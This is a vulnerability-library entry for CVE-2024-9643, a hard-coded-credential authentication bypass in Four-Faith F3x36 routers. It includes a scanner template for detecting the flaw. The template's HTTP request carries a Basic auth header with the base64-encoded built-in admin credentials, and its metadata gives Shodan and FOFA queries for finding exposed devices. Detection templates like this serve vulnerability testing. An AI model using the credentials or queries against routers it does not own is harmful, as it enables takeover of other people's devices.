/Vulnerability Library

Four-Faith F3x36 - Authentication Bypass

CVE-2024-9643
Verified

Description

Four-Faith F3x36 router with firmware v2.0.0 contains an authentication bypass caused by hard-coded credentials in the administrative web server, letting attackers with knowledge of credentials gain administrative access via crafted HTTP requests.

Severity

Critical

CVSS Score

9.8

Exploit Probability

19%

Affected Product

f3x36

Published Date

February 16, 2026

Template Author

trader642

CVE-2024-9643.yaml
id: CVE-2024-9643

info:
  name: Four-Faith F3x36 - Authentication Bypass
  author: trader642
  severity: critical
  description: |
    Four-Faith F3x36 router with firmware v2.0.0 contains an authentication bypass caused by hard-coded credentials in the administrative web server, letting attackers with knowledge of credentials gain administrative access via crafted HTTP requests.
  impact: |
    Attackers can gain unauthorized administrative access, potentially leading to full control over the device.
  remediation: |
    Update to the latest firmware version provided by the vendor to fix hard-coded credential issues.
  reference:
    - https://vulncheck.com/advisories/four-faith-hard-coded-creds
    - https://talosintelligence.com/vulnerability_reports/TALOS-2023-1752
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2024-9643
    epss-score: 0.19086
    epss-percentile: 0.95427
    cwe-id: CWE-798
  metadata:
    verified: true
    max-request: 1
    vendor: four-faith
    product: f3x36
    shodan-query: "Four-Faith"
    fofa-query: body="Four-Faith"
  tags: cve,cve2024,four-faith,default-login,router,iot,auth-bypass,vkev

http:
  - raw:
      - |
        GET /Status_Router.asp HTTP/1.1
        Host: {{Hostname}}
        Authorization: Basic ZmZhZG1pbjpmZmFkbWluZmY=

    matchers:
      - type: dsl
        dsl:
          - 'status_code == 200'
          - 'contains_all(body, "Four-Faith","Status")'
          - 'contains(server, "httpd_four-faith")'
        condition: and
# digest: 4a0a00473045022022c51d548d7ef03f742a4c03ed40930431150daaa5c26dc8037d94a096ceb999022100c874f59efecd02df34961dca6fd11d402044d14b51e80b8817a99591c6065141:922c64590222798bb761d5b6d8e72950
9.8Score

CVSS Metrics

CVSS Vector:
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE ID:
cve-2024-9643
CWE ID:
cwe-798

References

https://vulncheck.com/advisories/four-faith-hard-coded-credshttps://talosintelligence.com/vulnerability_reports/TALOS-2023-1752

Remediation Steps

Update to the latest firmware version provided by the vendor to fix hard-coded credential issues.